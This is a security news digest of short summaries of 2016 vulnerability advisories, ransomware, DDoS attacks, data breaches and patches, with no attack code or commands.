Security Alerts & News
by Tymoteusz A. Góral

History
#1529 Cisco warns of critical flaw in email security appliances
Cisco Systems released a critical security bulletin for a vulnerability that allows remote unauthenticated users to gain complete control of its email security appliances. The vulnerability is tied to Cisco’s IronPort AsyncOS operating system.

isco first issued a security bulletin last week for the IronPort AsyncOS, but on Wednesday updated that alert with more information including a software update that addresses the security flaw. Cisco also indicated a workaround exists that can halt remote access to affected email appliances.

Cisco says the vulnerability (CVE-2016-6406) is tied to the presence of the company’s own internal testing and debugging interface; accessible on the IronPort AsyncOS operating system. “An attacker could exploit this vulnerability by connecting to this testing and debugging interface. An exploit could allow an attacker to obtain complete control of an affected device with root-level privileges,” Cisco explains.
#1528 The psychological reasons behind risky password practices
Despite high-profile, large-scale data breaches dominating the news cycle – and repeated recommendations from experts to use strong passwords – consumers have yet to adjust their own behavior when it comes to password reuse.

A Lab42 survey, which polled consumers across the United States, Germany, France, New Zealand, Australia and the United Kingdom, highlights the psychology around why consumers develop poor password habits despite understanding the obvious risk, and suggests that there is a level of cognitive dissonance around our online habits.
#1527 Backdoored DLink router should be trashed, researcher says
A researcher who found a slew of vulnerabilities in a popular router said it’s so hopelessly broken that consumers who own them should throw them away.

Pierre Kim said attackers could easily exploit the vulnerabilities and use the device as a spamming zombie or a man-in-the-middle tool. “I advise users to trash their routers because it’s trivial for an attacker to use this router as an attack vector,” Kim said.
#1526 ‘Money Mule’ gangs turn to Bitcoin ATMs
Fraudsters who hack corporate bank accounts typically launder stolen funds by making deposits from the hacked company into accounts owned by “money mules,” willing or unwitting dupes recruited through work-at-home job scams. The mules usually are then asked to withdraw the funds in cash and wire the money to the scammers. Increasingly, however, the mules are being instructed to remit the stolen money via Bitcoin ATMs.
#1525 Data breach statistics 2016: First half results are in
So far, 2016 hasn’t been great in terms of data breach statistics. Based on newly released findings from the Breach Level Index (BLI), there were 974 publicly disclosed data breaches in the first half of 2016, which led to the successful theft or loss of 554 million data records.
#1524 Meet Apache Spot, a new open source project for cybersecurity
Hard on the heels of the discovery of the largest known data breach in history, Cloudera and Intel on Wednesday announced that they've donated a new open source project to the Apache Software Foundation with a focus on using big data analytics and machine learning for cybersecurity.

Originally created by Intel and launched as the Open Network Insight (ONI) project in February, the effort is now called Apache Spot and has been accepted into the ASF Incubator.

"The idea is, let's create a common data model that any application developer can take advantage of to bring new analytic capabilities to bear on cybersecurity problems," Mike Olson, Cloudera co-founder and chief strategy officer, told an audience at the Strata+Hadoop World show in New York. "This is a big deal, and could have a huge impact around the world."
#1523 Mamba ransomware strikes at your whole disk, not just your files
Mamba takes the approach of ransoming your whole disk one step further: it scrambles every disk sector, including the MFT, the operating system, your apps, any shared files and all your personal data, too.

Ironically, Mamba does all of this with very little programming effort: the malware simply installs and activates a pirated copy of the open source software DiskCryptor.
#1522 Google tackles XSS scripting flaws with new developer tools
Google has released two new tools for developers looking to protect web domains against XSS scripting security flaws.

Cross-site scripting (XSS) is a common security issue web developers face today. The attack, which relies on vulnerabilities which allow the injection of malicious codes into trusted websites and applications, can lead to malvertising campaigns, watering hole attacks, and drive-by attacks which do not need victims, visiting a trusted site, to do anything more than open a page.

Content Security Policy (CSP) is often the answer for web developers to stay clear of such attacks. CSP, support by all major browsers, can be used to restrict programming input and scripts and prevent them executing, even if attackers are able to inject malicious code into vulnerable web pages.
#1521 Record-breaking DDoS reportedly delivered by >145k hacked cameras
Last week, security news site KrebsOnSecurity went dark for more than 24 hours following what was believed to be a record 620 gigabit-per-second denial of service attack brought on by an ensemble of routers, security cameras, or other so-called Internet of Things devices. Now, there's word of a similar attack on a French Web host that peaked at a staggering 1.1 terabits per second, more than 60 percent bigger.

The attacks were first reported on September 19 by Octave Klaba, the founder and CTO of OVH. The first one reached 1.1 Tbps while a follow-on was 901 Gbps. Then, last Friday, he reported more attacks that were in the same almost incomprehensible range. He said the distributed denial-of-service (DDoS) attacks were delivered through a collection of hacked Internet-connected cameras and digital video recorders. With each one having the ability to bombard targets with 1 Mbps to 30 Mbps, he estimated the botnet had a capacity of 1.5 Tbps.

On Monday, Klaba reported that more than 6,800 new cameras had joined the botnet and said further that over the previous 48 hours the hosting service was subjected to dozens of attacks, some ranging from 100 Gbps to 800 Gbps. On Wednesday, he said more than 15,000 new devices had participated in attacks over the past 48 hours.
#1520 Europol warns of Android tap-and-go thefts
Law authorities have warned they believe criminals are using Android phones to trigger fraudulent tap-and-go payments.

The alert comes in Europol's annual Internet Organised Crime Threat Assessment report.

Experts had previously said that the rollout of smart wallet systems could raise such a threat.

However, the police are unsure exactly how the attacks are being carried out and how common they are.

"The possibility of compromising NFC [near field communication] transactions was explored by academia years ago, and it appears that fraudsters have finally made progress in the area," the report says.
#1519 IEEE sets new Ethernet standard that brings 5X the speed without disruptive cable changes
As expected the IEEE has ratified a new Ethernet specification -- IEEE P802.3bz – that defines 2.5GBASE-T and 5GBASE-T, boosting the current top speed of traditional Ethernet five-times without requiring the tearing out of current cabling.

The Ethernet Alliance wrote that the IEEE 802.3bz Standard for Ethernet Amendment sets Media Access Control Parameters, Physical Layers and Management Parameters for 2.5G and 5Gbps Operation lets access layer bandwidth evolve incrementally beyond 1Gbps, it will help address emerging needs in a variety of settings and applications, including enterprise, wireless networks.
#1518 Android.Lockscreen ransomware now using pseudorandom numbers
New variants of Android.Lockscreen are using pseudorandom passcodes to prevent victims from unlocking devices without paying the ransom. Previous versions of these threats locked the screen and used a hardcoded passcode, but analysts were able to reverse engineer the code to provide victims with the passcode to unlock their devices. Attackers have also combined a custom lockscreen with the device's lockscreen to create an additional hurdle for those infected. Similar to some other mobile threats we've observed, these Trojans are being created directly on mobile devices before being distributed. Symantec detects these threats as Android.Lockscreen.
#1517 Virlock ransomware can now use the cloud to spread, say researchers
A new variant of Virlock ransomware is capable of stealthily spreading itself through cloud storage and collaboration applications, potentially enabling one infected user to inadvertently spread the file-locking malware across their enterprise network.

The Virlock variant is yet another instance of cybercriminals deploying new techniques in order to make ransomware even more effective: it's expected to cost organisations a total of $1bn during 2016 alone.

Virlock has been active for almost two years now, and security researchers at Netskope have discovered how Virlock can employ a 'fan-out' effect, spreading itself through the use of cloud sync, cloud storage, and collaboration applications.
#1516 Kaspersky Cybersecurity Index
Cyberthreats are out there. Do people know about them? Are they being targeted? Are they protected? Take a look at this global problem with the Kaspersky Index.
#1515 Firefox ready to block certificate authority that threatened Web security
The organization that develops Firefox has recommended the browser block digital credentials issued by a China-based certificate authority for 12 months after discovering it cut corners that undermine the entire transport layer security system that encrypts and authenticates websites.

The browser-trusted WoSign authority intentionally back-dated certificates it has issued over the past nine months to avoid an industry-mandated ban on the use of the SHA-1 hashing algorithm, Mozilla officials charged in a report published Monday. SHA-1-based signatures were barred at the beginning of the year because of industry consensus they are unacceptably susceptible to cryptographic collision attacks that can create counterfeit credentials. To satisfy customers who experienced difficulty retiring the old hashing function, WoSign continued to use it anyway and concealed the use by dating certificates prior to the first of this year, Mozilla officials said. They also accused WoSign of improperly concealing its acquisition of Israeli certificate authority StartCom, which was used to issue at least one of the improperly issued certificates.

"Taking into account all the issues listed above, Mozilla's CA team has lost confidence in the ability of WoSign/StartCom to faithfully and competently discharge the functions of a CA," Monday's report stated. "Therefore we propose that, starting on a date to be determined in the near future, Mozilla products will no longer trust newly issued certificates issued by either of these two CA brands."
#1514 As we speak, teen social site is leaking millions of plaintext passwords
A social hangout website for teenage girls has sprung a leak that's exposing plaintext passwords protecting as many as 5.5 million user accounts. As this post went live, all attempts to get the leak plugged had failed.

Operators of i-Dressup didn't respond to messages sent by Ars informing them that a hacker has already downloaded more than 2.2 million of the improperly stored account credentials. The hacker said it took him about three weeks to obtain the cache and that there's nothing stopping him or others from downloading the entire database of slightly more than 5.5 million entries. The hacker said he acquired the e-mail addresses and passwords by using a SQL injection attack that exploited vulnerabilities in the i-Dressup website.
#1513 Sofacy APT targeting OSX machines with Komplex trojan
The prolific APT gang allegedly behind the DNC hack and other targeted attacks against Western military and political targets is using a new Trojan called Komplex to infect OS X machines used in the aerospace industry.

The gang, known as Sofacy, APT28, Fancy Bear, Sednit and Pawn Storm, is spreading the malware via phishing emails promising insight into the future of Russia’s space program, researchers at Palo Alto Networks said on Monday.

“Apple does a great job at defending OS X. The only thing being exploited here is the user. But it’s important to remember, people are still a target no matter what OS you use,” said Ryan Olson, intelligence director at Unit 42 of Palo Alto Networks.
#1512 How Dropbox securely stores your passwords
It’s universally acknowledged that it’s a bad idea to store plain-text passwords. If a database containing plain-text passwords is compromised, user accounts are in immediate danger. For this reason, as early as 1976, the industry standardized on storing passwords using secure, one-way hashing mechanisms (starting with Unix Crypt). Unfortunately, while this prevents the direct reading of passwords in case of a compromise, all hashing mechanisms necessarily allow attackers to brute force the hash offline, by going through lists of possible passwords, hashing them, and comparing the result. In this context, secure hashing functions like SHA have a critical flaw for password hashing: they are designed to be fast. A modern commodity CPU can generate millions of SHA256 hashes per second. Specialized GPU clusters allow for calculating hashes at a rate of billions per second.

Over the years, we’ve quietly upgraded our password hashing approach multiple times in an ongoing effort to stay ahead of the bad guys. In this post, we want to share more details of our current password storage mechanism and our reasoning behind it. Our password storage scheme relies on three different layers of cryptographic protections, as the figure below illustrates. For ease of elucidation, in the figure and below we omit any mention of binary encoding (base64).
#1511 Drupal patches multiple security flaws in core engine
Drupal has issued a security update which resolves three security flaws, two of which are deemed critical.

Earlier this week, the open-source website content management system (CMS) released a security advisory detailing the latest security issues which have been both discovered and fixed.

The three vulnerabilities, assigned as SA-CORE-2016-004, affect versions 8.x of the CMS and users are now advised to upgrade to Drupal 8.1.10.

The first bug, considered the least dangerous of the three, is a problem which allows users without admin rights to set comment visibility on nodes they have rights to edit. By default, these user accounts should not be able to made these changes.
#1510 MarsJoke ransomware mimics CTB-Locker
Ransomware in its various forms continues to make headlines as much for high-profile network disruptions as for the ubiquity of attacks among consumers. We recently noted the non-linear growth of ransomware variants and now a new type has emerged, dubbed MarsJoke.

Proofpoint researchers originally spotted the MarsJoke ransomware in late August [1] by trawling through our repository of unknown malware. However, beginning on September 22, 2016, we detected the first large-scale email campaign distributing MarsJoke. This ongoing campaign appears to target primarily state and local government agencies and educational institutions in the United States.

The targeting of state and local government agencies as well as the distribution methods are very similar to a CryptFile2 campaign we described in August [2]. Gary Warners’s blog also reported on this and similar campaigns, indicating that a well-known botnet, Kelihos, is responsible for distributing this spam.
#1509 Nearly all top global companies have leaked credentials online
Many CSOs live in fear of waking up to an email reporting a data breach at their company, but the threat to an enterprise isn’t limited to a compromise of that specific organization. A new report shows that there are leaked employee credentials online for 97 percent of the top 1,000 global companies, many of which came from third-party breaches.

The last few years have seen a number of large-scale breaches at popular sites and companies, including LinkedIn, Adobe, MySpace, and Ashley Madison, and many of the credentials stolen during those incidents have ended up online in various places. Corporate employees, like most other users, often reuse their credentials in several places. But the worrisome thing is that many of them are using their work email addresses and passwords as credentials on third-party sites.
#1508 OpenSSL patches high-severity OCSP bug, mitigates SWEET32 attack
A vulnerability in the OpenSSL implementation of the Online Certificate Status Protocol (OCSP) was patched this week, closing a denial-of-service weakness in affected servers.

The patch was the most severe of 14 released yesterday by OpenSSL.

OCSP is an alternative in many cases to Certificate Revocation Lists where a client can use the protocol to ping a server requesting the status of a digital certificate.
#1507 We're told data breaches cost millions on average - but this security study disagrees
Far from running into millions, the average cost of a data breach is less than $200,000, or roughly what firms are spending on IT security systems, according to a study from non-profit thinktank RAND.

The study, published in the Journal of Cybersecurity, challenges the much higher cost estimates provided by the Ponemon Institute. This year that research organization put the average cost of a breach at $4m.

RAND policy researcher Sasha Romanosky analyzed 12,000 events between 2004 and 2015 and found that the cost to each firm was on average less than $200,000. This figure is on a par with the 0.4 percent of revenues that firms in the study spent annually on IT security.
#1506 Cisco Talos: Spam at levels not seen since 2010
Spam is back in a big way – levels that have not been seen since 201o in fact. That’s according to a blog post today form Cisco Talos that stated the main culprit of the increase is largely the handiwork of the Necurs botnet, stated the blog’s author Jaeson Schultz.

“Many of the host IPs sending Necurs' spam have been infected for more than two years. To help keep the full scope of the botnet hidden, Necurs will only send spam from a subset of its minions. An infected host might be used for two to three days, and then sometimes not again for two to three weeks. This greatly complicates the job of security personnel who respond to spam attacks, because while they may believe the offending host was subsequently found and cleaned up, the reality is that the miscreants behind Necurs are just biding their time, and suddenly the spam starts all over again. At Talos, we see this pattern over, and over again for many Necurs-affiliated IPs,” he wrote.
#1505 Vulnerable ISAKMP Scanning Project
This scan is looking for devices that contain a vulnerability in their IKEv1 packet processing code that could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

The goal of this project is to identify the vulnerable systems and report them back to the network owners for remediation.
#1504 71 percent of Australian-used IoT devices failed privacy probe
The Office of the Australian Information Commissioner (OAIC) has found that 71 percent of Internet of Things (IoT) devices and services used by Australians failed to adequately explain how personal information was collected, used, and disclosed.

According to Australian Privacy Commissioner Timothy Pilgrim, the seamless nature of how IoT devices collect, store, and share user information means that customers are not always fully aware of the privacy risks.

"The Internet of Things allows for some great products and entertainment, but many of us have adopted this technology into our everyday lives without considering how much of our personal information is being captured or what happens to that information," he said.
#1503 From RAR to JavaScript: ransomware figures in the fluctuations of email attachments
Why is it critical to stop ransomware at the gateway layer? Because email is the top entry point used by prevalent ransomware families. Based on our analysis, 71% of known ransomware families arrive via email. While there’s nothing new about the use of spam, ransomware distributors continue to employ this infection vector because it’s a tried-and-tested method. It’s also an effective way to reach potential victims like enterprises and small and medium businesses (SMBs) that normally use emails for communication and daily operations. Over the first half of the year, we observed how cybercriminals leveraged file types like JavaScript, VBScript, and Office files with macros to evade traditional security solutions. Some of these file types can be used to code malware. In fact, as a security precaution, Microsoft turns off macros by default.

In this blog post, we examine various email file attachments and how ransomware affected the fluctuation in the use of these file types.
#1502 Cisco warns of command injection flaw in Cloud platform
It’s already been a busy month of patching for Cisco Systems, and on Wednesday the networking giant rolled out nine more security updates addressing critical vulnerabilities across its core product lines.

Most notably, Cisco is warning of two security holes (one rated critical, the other high) found in its Cisco Cloud Services Platform 2100 (CCSP). One could allow an unauthenticated remote attacker to execute arbitrary code on a targeted system. The other is a command injection vulnerability found in the web-based GUI of the CCSP. This critical vulnerability could allow a remote attacker to gain root access privileges on CCSP’s underlying OS and execute arbitrary commands.

In both CCSP cases, Cisco has released software patches to fix the vulnerabilities.
#1501 Don’t plug it in! Scammers post infected USB sticks through letterboxes
Unexpectedly received a USB stick in the post? Whatever you do … DON’T PLUG IT IN!!

Police in the Australian state of Victoria are warning the public about cybercriminals’ latest tactic: randomly dropping unmarked USB sticks containing malware through letterboxes.

The criminals are of course hoping that the unsuspecting recipients will plug the freebie USB drives into their computers.
#1500 A bite of Python
Being easy to pick up and progress quickly towards developing larger and more complicated applications, Python is becoming increasingly ubiquitous in computing environments. Though apparent language clarity and friendliness could lull the vigilance of software engineers and system administrators -- luring them into coding mistakes that may have serious security implications. In this article, which primarily targets people who are new to Python, a handful of security-related quirks are looked at; experienced developers may well be aware of the peculiarities that follow.
#1499 More than 840,000 Cisco devices are vulnerable to NSA-related exploit
More than 840,000 Cisco networking devices from around the world are exposed to a vulnerability that's similar to one exploited by a hacking group believed to be linked to the U.S. National Security Agency.

The vulnerability was announced by Cisco last week and it affects the IOS, IOS XE, and IOS XR software that powers many of its networking devices. The flaw allows hackers to remotely extract the contents of a device's memory, which can lead to the exposure of sensitive information.

The vulnerability stems from how the OS processes IKEv1 (Internet Key Exchange version 1) requests. This key exchange protocol is used for VPNs (Virtual Private Networks) and other features that are popular in enterprise environments.
#1498 Bug that hit Firefox and Tor browsers was hard to spot—now we know why
A recently fixed security vulnerability that affected both the Firefox and Tor browsers had a highly unusual characteristic that caused it to threaten users only during temporary windows of time that could last anywhere from two days to more than a month.

As a result, the cross-platform, malicious code-execution risk most recently visited users of browsers based on the Firefox Extended Release on September 3 and lasted until Tuesday, or a total of 17 days. The same Firefox version was vulnerable for an even longer window last year, starting on July 4 and lasting until August 11. The bug was scheduled to reappear for a few days in November and for five weeks in December and January. Both the Tor Browser and the production version of Firefox were vulnerable during similarly irregular windows of time.

While the windows were open, the browsers failed to enforce a security measure known as certificate pinning when automatically installing NoScript and certain other browser extensions. That meant an attacker who had a man-in-the-middle position and a forged certificate impersonating a Mozilla server could surreptitiously install malware on a user's machine. While it can be challenging to hack a certificate authority or trick one into issuing the necessary certificate for addons.mozilla.org, such a capability is well within the means of nation-sponsored attackers, who are precisely the sort of adversaries included in the Tor threat model. Such an attack, however, was only viable at certain periods when Mozilla-supplied "pins" expired.
#1497 SWIFT confirms banks still being targeted, announces mitigation tool
SWIFT’s chief information security officer said Wednesday that the cooperative is still seeing cases where its customers’ environments have been compromised.

“The threat is persistent, adaptive and sophisticated – and it is here to stay,” Alain Desausoi, the cooperative’s CISO said, adding fraudulent attempts continue to be made through its network to trick banks to send payments.

Desausoi was speaking at the Financial Times Cyber Security Summit Europe in London. In a conversation with Kara Scannell, the publication’s investigations correspondent, the CISO touched on the security of SWIFT’s customers and described a new tool the cooperative, announced Tuesday, aimed at strengthening its customers existing fraud controls and designed to mitigate future cyber threats.

The tool, called Daily Validation Reports, will give banks and other clients the ability to review a daily summary of their messages. According to a press release issued by the Brussels-based cooperative, the tool is slated for release in December and will help customers verify message activity and tip them off to any unusual patterns.
#1496 IoT devices being increasingly used for DDoS attacks
Malware targeting the Internet of Things (IoT) has come of age and the number of attack groups focusing on IoT has multiplied over the past year. 2015 was a record year for IoT attacks, with eight new malware families emerging. More than half of all IoT attacks originate from China and the US. High numbers of attacks are also emanating from Russia, Germany, the Netherlands, Ukraine and Vietnam.

Poor security on many IoT devices makes them soft targets and often victims may not even know they have been infected. Attackers are now highly aware of lax IoT security and many pre-program their malware with commonly used and default passwords.

IoT attacks have long been predicted, with plenty of speculation about possible hijacking of home automation and home security devices. However, attacks to date have taken a different shape. Attackers tend to be less interested in the victim and the majority wish to hijack a device to add it to a botnet, most of which are used to perform distributed denial of service (DDoS) attacks.
#1495 Future attack scenarios against ATM authentication systems
A lot has already been said about current cyber threats facing the owners of ATMs. The reason behind the ever-growing number of attacks on these devices is simple: the overall level of security of modern ATMs often makes them the easiest and fastest way for fraudsters to access the bank’s money. Naturally, the banking industry is reacting to these attacks by implementing a range of security measures, but the threat landscape is continually evolving. In order to prepare banks for what they should expect to see from criminals in the near future, we’ve prepared an overview report of future cyberthreats to ATMs. The report will – we hope – help the industry to better prepare for a new generation of attack tools and techniques.

The report comprises two papers in which we analyze all existing methods of authentication used in ATMs and those expected to be used in the near future, including: contactless authentication through NFC, one-time password authentication and biometric authentication systems, as well as potential vectors of attacks using malware, through to network attacks and attacks on hardware components.
#1494 Massive web attack hits security blogger
One of the biggest web attacks ever seen has been aimed at a security blogger after he exposed hackers who carry out such attacks for cash.

The distributed denial of service (DDoS) attack was aimed at the website of industry expert Brian Krebs.

At its peak, the attack aimed 620 gigabits of data a second at the site.

Text found in attack data packets suggested it was mounted to protest against Mr Krebs' work to uncover who was behind a prolific DDoS attack.

In a blogpost, Mr Krebs detailed the attack, which began late on Tuesday night and quickly ramped up to its peak attack rate.

DDoS attacks are typically carried out to knock a site offline - but Mr Krebs' site stayed online thanks to work by security engineers, who said the amount of data used was nearly twice the size of the largest attack they had ever seen.
#1493 Malware evades detection with novel technique
Researchers have found a new strain of document-based macro malware that evades discovery by lying dormant when it detects a security researcher’s test environment.

The malware, according to researcher Caleb Fenton with security firm SentinelOne, evades detection simply by counting the number of documents – or the lack thereof – that reside on a PC and not executing if a certain number are not present.

Fenton, who discovered the malware after several failed attempts to trigger the sample into acting maliciously, said the typical lack of documents in a virtual machine and sandboxed test environment make it easy, in this case, for malware authors to fly under the radar.
#1492 Yahoo is expected to confirm a massive data breach, impacting hundreds of millions of users
Yahoo is poised to confirm a massive data breach of its service, according to several sources close to the situation, hacking that has exposed several hundred million user accounts.

While sources were unspecific about the extent of the incursion, since there is the likelihood of government investigations and legal action related to the breach, they noted that it is widespread and serious.

Earlier this summer, Yahoo said it was investigating a data breach in which hackers claimed to have access to 200 million user accounts and one was selling them online. “It’s as bad as that,” said one source. “Worse, really.”

The announcement, which is expected to come this week, also has possible larger implications for the $4.8 billion sale of Yahoo’s core business — which is at the core of this hack — to Verizon. The scale of the liability could bring untold headaches to the new owners. Shareholders are likely to worry that it could lead to an adjustment in the price of the transaction.
#1491 iSpy Keylogger targets passwords, Skype, webcams
Researchers are monitoring sales and infection rates of a new keylogger being sold on the dark web for $25 to $35.

Along with capturing keystrokes, iSpy grabs passwords stored in web browsers, records Skype chats, takes webcam screenshots and steals the license keys of software such as Adobe Photoshop and Microsoft Office.

According to Zscaler ThreatLabZ, the malware is delivered via malicious JavaScript or document attachments in spam campaigns. What makes iSpy a unique keylogger, says ThreatLabZ, is the fact versions of it are signed and use (expired) digital certificates in an attempt to maintain an appearance of legitimacy when being scanned initially by security software.
#1490 New malware is hitting your network every four seconds
An exponential rise in malware means employees are at the highest risk ever of accidentally installing malicious software onto the enterprise network - and it happens every four seconds within the average company, a new report has warned.

Cybersecurity researchers at Check Point analysed information on over 30,000 security events discovered by the company's ThreatCloud prevention software at more than 1,000 companies across the globe.

They found that employees in industry, finance, government and other sectors are very much taking a cavalier attitude to cybersecurity and downloading potentially harmful files to the company network.

It's unknown malware - malicious software which isn't yet recognised by security systems - which is most likely to be downloaded by employees and according to the report, it happens every four seconds on average across the organisations analysed in the report. The figure adds up to 971 unknown malware downloads per hour, representing nine times more downloads than the previous year, when the figure was 106 downloads per hour.
#1489 Malware-infected USB sticks posted to Australian homes
USB sticks containing harmful malware have been left in Australian letterboxes, police in Victoria have warned.

Residents of Pakenham, a suburb of Melbourne, have reportedly found the unmarked sticks in the boxes.

Plugging them into a computer triggers fraudulent media-streaming service offers, as well as other malware, the force said in a statement.

The devices are "extremely harmful" and should not be used, police say.
#1488 The banker that can steal anything
In the past, we’ve seen superuser rights exploit advertising applications such as Leech, Guerrilla, Ztorg. This use of root privileges is not typical, however, for banking malware attacks, because money can be stolen in numerous other ways that don’t require exclusive rights. However, in early February 2016, Kaspersky Lab discovered Trojan-Banker.AndroidOS.Tordow.a, whose creators decided that root privileges would come in handy. We had been watching the development of this malicious program closely and found that Tordow’s capabilities had significantly exceeded the functionality of most other banking malware, and this allowed cybercriminals to carry out new types of attacks.
#1487 Mamba ransomware encrypts hard drives rather than files
Just when we thought ransomware’s evolution had peaked, a new strain has been discovered that forgoes the encryption of individual files, and instead encrypts a machine’s hard drive.

The malware, called Mamba, has been found on machines in Brazil, the United States and India, according to researchers at Morphus Labs in Brazil. It was discovered by the company in response to an infection at a customer in the energy sector in Brazil with subsidiaries in the U.S. and India.

Renato Marinho, a researcher with Morphus Labs, told Threatpost that the ransomware is likely being spread via phishing emails. Once it infects a machine, it overwrites the existing Master Boot Record with a custom MBR, and from there, encrypts the hard drive.
#1486 DDoS mitigation firm has history of hijacks
Last week, KrebsOnSecurity detailed how BackConnect Inc. — a company that defends victims against large-scale distributed denial-of-service (DDoS) attacks — admitted to hijacking hundreds of Internet addresses from a European Internet service provider in order to glean information about attackers who were targeting BackConnect. According to an exhaustive analysis of historic Internet records, BackConnect appears to have a history of such “hacking back” activity.

On Sept. 8, 2016, KrebsOnSecurity exposed the inner workings of vDOS, a DDoS-for-hire or “booter” service whose tens of thousands of paying customers used the service to launch attacks against hundreds of thousands of targets over the service’s four-year history in business.
#1485 Data-stealing Qadars Trojan malware takes aim at 18 UK banks
A three-year-old banking Trojan, believed to be the work of experienced and organised Russian cybercriminals, has now turned its attention to UK banks.

The Qadars Trojan has been active since 2013. Using several different versions, the malware has targeted banks in different regions, beginning with France and the Netherlands during 2013 and 2014, then Australia, Canada, the United States, and the Netherlands during 2015 and 2016.

Now, cybersecurity researchers at IBM X-Force Research -- who last month spotted malware attacking Brazilian banks ahead of the Olympics -- have observed the launch of a fresh version of Qadars and a new infection campaign.
#1484 Vulnerability patched in WordPress theme that allows unrestricted uploads
WordPress theme publisher DynamicPress fixed a flaw Monday that let anyone upload malicious files to sites running its business-themed Neosense WordPress templates, compromise the site and possibly the server hosting it.

Walter Hop, security researcher with Netherlands-based company, Slik, made the discovery last week. The flaw impacts version 1.7 of the Neosense theme. On Monday, DynamicPress released a 1.8 version update that patches the vulnerability. Hop publicly disclosed the vulnerability Monday.
#1483 324,000 payment cards breached, CVVs included
About two months ago, a Twitterer going by 0x2Taylor announced a sizeable data dump.

More than 300,000 credit card records were uploaded to the file sharing service Mega; the data has since been removed from Mega, but not before it was widely downloaded by many interested parties.

By some standards, 300,000 stolen records doesn’t sound very many these days.

That’s a sad state of affairs, of course, caused by the daunting size of some high-profile attacks that have hit the news recently.
#1482 Fake AV makes it onto Google Play
Every once in a while, a fake antivirus pops up on the Google Play store. Most of the time, it’s just a fake scanner that doesn’t detect anything because it doesn’t actually look for anything to detect. Show a scan that simply lists all the apps on your device and it’s pretty easy to look legit. They serve up some ads for revenue, and you are given the false sense your phone isn’t infected—kind of a win-win unless you actually want malicious apps to be detected/removed.

These apps are often ignored by real AV scanners because, technically, they aren’t doing anything malicious. It’s only when malicious intent is found that these apps are classified as bad.

With a clean design and look, Antivirus Free 2016 could very easily be confused for a legitimate AV scanner.
#1481 Cisco IOS Software Checker
Use the Cisco IOS Software Checker tool to search for Cisco Security Advisories that apply to specific Cisco IOS and IOS XE Software releases and have a Security Impact Rating (SIR) of Critical or High. Note that the tool does not provide information about security advisories that have a SIR of Medium. In addition, the tool does not support Cisco IOS XR Software or interim builds of Cisco IOS Software.

To use the tool, choose a release from the drop-down list, enter the output of the show version command, or upload a text file that lists specific releases.
#1480 Untangling the Ripper ATM malware
Last August , security researchers released a blog discussing a new ATM malware family called Ripper which they believe was involved in the recent ATM attacks in Thailand. Large numbers of ATMs were also temporarily shut down as a precautionary measure.

That analysis gave an overview of the techniques used by the malware, the fact that it targets three major ATM vendors, and compared Ripper to previous ATM malware families. Their analysis was based on the file with MD5 hash 15632224b7e5ca0ccb0a042daf2adc13. This file was uploaded to Virustotal by a user in Thailand on August 23.

During our analysis we noticed some additional details that where not called out, or which appear to contradict this earlier analysis. We highlight these differences in this blog post. We have also included technical indicators such as code offsets where possible for other researchers to follow on from our work.

In April of this year, Trend Micro’s Forward Looking Threat Research team and Europol EC3 collaborated on a comprehensive report on all ATM malware threats known at that point. We have been watching out for new families since then. The paper was made available to members of the Financial and Law Enforcement communities. If you are part of these industries, have not received a copy, and would like one, please contact Robert McArdle.
#1479 Ransomware's next target: Your car and your home
Ransomware is perhaps the biggest cybersecurity scourge of 2016, becoming increasingly problematic both for individuals and businesses of all sizes.

The concept is simple: the cybercriminal will trick a victim into opening a malicious file or a clicking on a link which causes their computer, tablet, or smartphone to be infected with malware that encrypts the data stored on the device. The cybercriminal then demands the victim pay a ransom -- often in Bitcoin -- in order to get their systems unlocked.

While the ransomware installs data-stealing malware on your system, getting infected with ransomware is more an annoyance more than anything. Yes, a business will lose money while its networks are locked down, but most cases it doesn't have any further 'real world' consequences, as the theft of personal data or banking information might.
#1478 Cisco warns of second firewall bug exposed by Shadow Brokers
Cisco is scrambling to patch another vulnerability in many of its products that was exposed as part of the Shadow Brokers dump last month. The latest vulnerability affects many different products, including all of the Cisco PIX firewalls.

The latest weakness lies in the code that Cisco’s IOS operating system uses to process IKEv1 packets. IKE is used in the IPSec protocol to help set up security associations, and Cisco uses it in a number of its products. The company said in an advisory that many versions of its IOS operating system are affected, including IOS XE and XR.

“A vulnerability in IKEv1 packet processing code in Cisco IOS, Cisco IOS XE and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information,” the advisory says.
#1477 Mozilla patching Firefox certificate pinning vulnerability
Mozilla is expected tomorrow to patch a critical vulnerability in Firefox’s automated update process for extensions that should put the wraps on a confusing set of twists surrounding this bug. The flaw also affected the Tor Browser and was patched Friday by the Tor Project.

The vulnerability first saw light of day last week when a researcher who goes by the handle movrck published his disclosure. He said that a resourced attacker with the ability to steal or forge a TLS certificate for addons.mozilla.org could put the entire Tor (and Firefox) ecosystem at risk to compromise.
#1476 Facebook page takeover – zero-day vulnerability
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.
#1475 Blizzard hit with DDoS attack disrupting play for gamers
Blizzard Entertainment was hit with a denial-of-service attack on Sunday that knocked its Battle.net servers offline.

"We are currently monitoring a DDOS attack against network providers which is affecting latency/connections to our games," Blizzard wrote in a tweet.

Battle.net runs many of Blizzard's popular games, including Overwatch, World of Warcraft, Hearthstone: Heroes of Warcraft, and more.
#1474 IKEv1 information disclosure vulnerability in multiple Cisco products
A vulnerability in IKEv1 packet processing code in Cisco IOS, Cisco IOS XE and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability.
#1473 Mozilla plans Firefox fix for same malware vulnerability that bit Tor
Mozilla officials say they'll release a Firefox update on Tuesday that fixes the same cross-platform, malicious code-execution vulnerability patched Friday in the Tor browser.

